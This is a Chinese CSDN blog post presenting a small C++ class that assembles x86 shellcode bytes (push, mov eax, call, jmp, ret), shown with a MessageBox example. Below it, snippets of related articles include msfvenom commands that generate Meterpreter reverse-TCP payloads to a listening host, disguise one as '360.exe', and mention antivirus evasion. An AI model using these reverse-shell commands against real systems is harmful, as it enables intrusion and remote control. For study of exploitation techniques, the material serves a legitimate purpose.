一个简单用来生成shellcode的类

最新推荐文章于 2024-04-17 07:41:23 发布
最新推荐文章于 2024-04-17 07:41:23 发布
阅读量187 收藏 2
点赞数 2
分类专栏: win32 文章标签: 安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/122695221
版权

前几天在生成shellcode的时候用的硬编码,后来自己写了个类,可以用来接收一些地址什么的动态生成

class SHELLCODE {
public:
	int size;
	int now_point;
	BYTE* shellcode;
	SHELLCODE(int size);
	void append(BYTE payload);
	void append(WORD payload);
	void append(DWORD payload);
	void push(LONG payload);
	void moveax(DWORD payload);
	void jmpeax();
	void jmp_eax_();
	void jmp_address_(DWORD payload);
	void calleax();
	void call_eax_();
	void call_address_(DWORD payload);
	void ret(BYTE payload);
};

size保存的是总的大小,now_point是当前可以填充的下一个指针,复制shellcode时候大小就是now_point
call_eax_代表了 call[eax]
calleax就是 call eax

SHELLCODE::SHELLCODE(int size) {
	this->size = size;
	this->now_point = 0;
	this->shellcode = (BYTE*)malloc(sizeof(BYTE)*size);
}
void SHELLCODE::append(BYTE payload) {
	this->shellcode[now_point] = payload;
	this->now_point++;
}
void SHELLCODE::append(WORD payload) {
	this->append(*((BYTE*)&payload));
	this->append(*((BYTE*)&payload + 1));
}
void SHELLCODE::append(DWORD payload) {
	this->append(*((WORD*)&payload));
	this->append(*((WORD*)&payload + 1));
}
void SHELLCODE::push(LONG payload) {
	if (payload >= -128 && payload <= 127) {
		this->append((BYTE)0x6a);
		this->append((BYTE)payload);
	}
	else {
		this->append((BYTE)0x68);
		this->append((DWORD)payload);
	};
}
void SHELLCODE::moveax(DWORD payload) {
	this->append((BYTE)0xb8);
	this->append(payload);
}
void SHELLCODE::jmpeax() {
	this->append((WORD)0xe0ff);
}
void SHELLCODE::jmp_eax_() {
	this->append((WORD)0x20ff);
}
void SHELLCODE::jmp_address_(DWORD payload) {
	this->append((WORD)0x25ff);
	this->append(payload);
}
void SHELLCODE::calleax() {
	this->append((WORD)0xd0ff);
}
void SHELLCODE::call_eax_() {
	this->append((WORD)0x10ff);
}
void SHELLCODE::call_address_(DWORD payload) {
	this->append((WORD)0x15ff);
	this->append(payload);
}
void SHELLCODE::ret(BYTE payload) {
	this->append((BYTE)0xc2);
	this->append(payload);
	this->append((BYTE)0x00);
}

比如说我们要构造一个messagebox的汇编
简单的使用

SHELLCODE shellcode(100);
shellcode.push(0);
shellcode.push(0);
shellcode.push(0);
shellcode.push(0);
shellcode.moveax(地址)
shellcode.calleax()
shellcode.ret(0x10)
azraelxuemo
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用MSF生成shellcode
weixin_34092455的博客
04-02 1038
使用MSF生成shellcode payload和shellcode的区别 Payload是是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的,ShellCode是真正的被输入到存在漏洞的程序中的,并且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说,ShellCode就...
简单shellcode制作
renyizou的博客
06-16 235
一串机器能执行的代码 msfvenom msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.183.202 LPORT=4343 -f exe > 360.exe 生成一个名字叫360.exe的木马 此时还需要一个监听端--msf中的监听模块 use exploit/multi/handler 设置好lhost和lpost,记得设置payload,开启监听 运行木马 就能建立session,直接就进去了 linux ..
shellcode
赵花花08042的博客
01-28 4127
https://www.bilibili.com/video/BV1y4411k7ch/?spm_id_from=333.788.recommend_more_video.3 什么是shellcode? 通常情况下,编写代码生成pe文件(即exe文件)(运行所需的宿主 意思就是,需要先运行exe) 而shellcode,不被包装在pe中,以二进制的方式存放到 举例:实现弹窗提示功能 编译后,运行生成的exe文件,弹出框 把代码中的核心代码MassegeBOX提取出来就是shellcode 通过特殊处
一款开源的ShellCode生成引擎
11-29
1.本工具只支持x86 coff格式的文件 2.全局变量记得初始化,测试的时候发现有事全局变量没有初始化会获取不到 3.关闭MSVC的全局优化,开启全局优化时OBJ中的信息无法获取 4.不要在代码中使用c++一些特性,似异常等,测试时发现基本的是可以满足的不要使用c++的一些库,切记
手动制作shellcode
fanghuapyk的博客
03-19 598
概括: 我们要将自己生成shellcode汇编文件,编译为.o文件,然后再编译为可执行文件,然后将可执行文件中的有用的代码段单独复制出来,最后我们利用python脚本将我们的这一个文件发送到测试的程序中去 一:准备shellcode文件 1将汇编代码文件shellcode_32.Asm中代码编译为shellcode_32.o文件 命令为:nasm -f elf32 -o shellcode_32.o shellcode_32.asm push 0x68 push 0x732f2f2f push 0x6e6
shellcode-to-dll:shellcode 异或加密并生成dll
04-23
Shellcode是一种低级代码,通常用汇编语言编写,用于在目标系统上执行特定操作,如启动一个进程、打开网络连接等。它被设计成可以直接注入到内存中执行,而无需通过磁盘上的可执行文件。在网络安全和逆向工程领域,...
Delphi编写ShellCode的示例
02-22
下面是一个简单的例子,展示了如何在Delphi中创建一个ShellCode,执行"cmd.exe": ```delphi program ShellCodeExample; {$APPTYPE CONSOLE} uses SysUtils; const ShellCode: Array[0..31] of Byte = ( $B8,...
shellcode编写国外精典文档
04-05
假设我们需要编写一个简单的Linux Shellcode来执行`/bin/sh`命令: 1. **确定系统调用**:首先需要知道Linux中执行`execve`系统调用来启动新的进程。 2. **设置参数**:将`"/bin/sh"`的地址作为参数传递给`execve`...
65.远控免杀专题(65)-shellcode免杀实践1
08-03
在第一部分,作者介绍了通过使用Code Signing Studio(CS)生成C语言形式的shellcode,并利用Visual Studio(VS)编写程序加载这段shellcode,最终生成木马程序。这种方法生成的可执行文件有时可以逃避一些杀毒软件...
shellcode自动生成技术研究
07-20
shellcode基本形式入手,说明shellcode编写方法,从而进行自动化生成
使用C/Delphi编写ShellCode
冷风
03-06 2755
这里说的ShellCode指的是一段x86机器码,无需重定位,在内存任何位置都可以执行的代码.使用C/Delphi编写代码也是由其编译器特性决定的。一说起ShellCode,一般人都想到MASM/TASM/FASM/NASM这汇编语言编译器,但是,汇编语言写ShellCode维护起来总是很麻烦,肯定不如高级语言维护起来方便,尤其是大型的工程,例如PE Virus/Packer这样的工程。Shel
Windows Shellcode学习笔记——通过VisualStudio生成shellcode
weixin_33753003的博客
09-25 1652
本文讲的是Windows Shellcode学习笔记——通过VisualStudio生成shellcode, 0x00 前言 shellcode是一段机器码,常用作漏洞利用中的载荷(也就是payload)。 在渗透测试中,最简单高效的方式是通过metasploit生成shellcode,然而在某些环境下,需要定制开发自己的shellcode,所以需要对...
CSSG:Cobalt Strike Shellcode生成工具,2024年最新面试官都被搞懵了
最新发布
2401_83973943的博客
04-17 1021
生成一个信标Shellcode Payload,该Payload可以从同一架构父信标继承关键函数指针。除此之外,工具还会在在加密的Shellcode数据前面加上一个随机生成的向量。使用外部生成的原始Shellcode文件代替生成信标Shellcode。Gzip + b64 - 先进行gzip压缩,然后进行Base64编码。b64 + gzip - 先进行Base64编码,然后进行gzip压缩。生成x86 Shellcode,默认生成x64 Shellcode
如何编写本地shellcode
海枫的专栏
02-01 9498
本文介绍使用汇编语言编写shellcode的技巧,如零数值,绝对地址以及Linux系统调用约定。最后成功编写一个本地shellcode
linux 生成shellcode,基本shellcode提取方法
weixin_35747051的博客
05-13 229
下面,我们用C语言内嵌汇编的方式,构造shellcode,具体代码如下。有一点要注意,Linux X86默认的字节序是little-endian,所以压栈的字符串要注意顺序。(如“/bin/bash”,其16进制表示为0x2f 0x62 0x69 0x6e 0x2f 0x62 0x61 0x73 0x68,在little-endian模式下,其表示为0x68 0x73 0x61 0x62 0x2f...
能够生成木马的ShellCode
06-25 2041
最近一个朋友在WMF漏洞利用的ShellCode编写上遇到了麻烦:他需要编写的ShellCode功能是这样的:将绑定在.wmf文件中的.exe文件提取、生成并自动执行。经过一整天的努力这个问题基本部分解决了,但仍然存在一点疑惑,正好写下本文和大家讨论。基础知识讨论ShellCode之前,需要掌握两个基础知识:1、.exe文件已经绑定到了.wmf文件中。怎么绑定呢?通过copy命令:"copy /b
如何生成stage shellcode
thesum的专栏
02-06 743
1.进入kaili 运行msfpayload -l 就可以列举shellcode 2.运行msfpayload -l|grep "windows"|grep "bind" 就可以找到想要的shellcode 3.运行 msfpayload windows/dllinject/bind_tcp o 就可以查看该shellcode的参数 4.运行msfpayload windows/dlli
(*(void(*)())&shellcode)();
qq_34071268的博客
07-18 258
(*(void(*)())&shellcode)();
msf生成shellcode
06-28
### 回答1: MSF生成shellcode是一种常见的渗透测试技术,可以用于获取目标系统的控制权。使用MSF生成shellcode需要掌握一定的技术知识和经验,包括了解目标系统的漏洞、了解不同型的shellcode以及使用MSF生成工具等。通过合理使用MSF生成shellcode,可以有效提高渗透测试的效率和成功率。 ### 回答2: MSF(Metasploit Framework)是一个广泛使用的渗透测试工具,常用于开发和测试网络安全漏洞。它的一个特色是可以自动生成各种Payload,包括各种平台的ShellcodeShellcode是一种十六进制编码的机器语言代码,它通常被黑客和渗透测试人员用于攻击目标计算机系统。通过使用MSF Framework,我们可以生成各种型的Shellcode,这些Shellcode可以按照我们自己的需要进行定制。 在MSF Framework中,我们可以使用msfvenom工具生成Shellcode,该工具是一个十分强大的Payload 生成器,使用起来非常简单。首先,我们要指定Payload的型,比如说是Windows还是Linux,以及处理器架构和操作系统版本。 生成Windows平台的Shellcode,我们可以使用下面这条命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f hex -o shellcode.txt 其中,“-p”指定Payload,这里我们使用的是windows/meterpreter/reverse_tcp,它可以反向连接我们指定的IP地址和端口。LHOST是我们的IP地址,LPORT是监听的端口。然后我们指定输出格式是hex,将其输出到shellcode.txt文件中。 生成Linux平台的Shellcode也很简单,我们可以使用下面这条命令: msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f hex -o shellcode.txt 这里我们使用的是linux/x86/shell/reverse_tcp Payload,它也可以反向连接指定的IP地址和端口。 总的来说,生成Shellcode是非常重要的黑客工作,使用MSF Framework的msfvenom工具可以帮我们快速生成各种型的Shellcode,而且十分方便实用。但是需要注意的是,使用Shellcode进行攻击可能会违法,所以使用前要自觉遵守相关法律规定。 ### 回答3: MSF是Metasploit框架的简称,它是一种广泛使用的网络攻击工具。MSF有许多功能,其中一个基本功能就是生成shellcodeShellcode是位于程序中的二进制代码,其目的是执行特定的操作,比如弹出一个命令行窗口来执行攻击者命令等等。在网络攻击中,shellcode往往是黑客的“最后一击”,用来穿过目标系统的防御措施,从而实现控制盗窃信息或实施其他恶意行为。 MSF生成shellcode的步骤如下: 1. 打开MSF控制台,使用"msfvenom"命令来生成shellcode。我们可以使用如下命令来进行生成: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP address> LPORT=<attacker port number> -f <output file format> -o <output file location> 其中,“-p"参数代表payload(负载,即要注入目标系统的代码),windows/meterpreter/reverse_tcp是要注入的代码型;"LHOST"参数代表攻击者的IP地址,"LPORT"参数代表攻击者的端口号;"-f"参数代表输出文件的格式;"-o"参数代表输出文件的位置。 2. 运行该命令后,MSF会生成自定义的shellcode,其格式为二进制代码。我们可以将其保存在本地,以备后续使用。 3. 将shellcode注入到目标系统中。可以使用一些漏洞利用工具,如MSF框架,或在攻击者手动操作目标系统时,利用目标服务器上已知漏洞的服务向该服务器注入shellcode。一旦该shellcode开始运行,攻击者就可以进入目标服务器并获取所需的信息。 需要注意的是,生成shellcode需要有一定的网络安全知识以及操作系统相关知识。同时,使用MSF框架及其相关工具进行攻击是非法行为,一定要遵守法律规定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值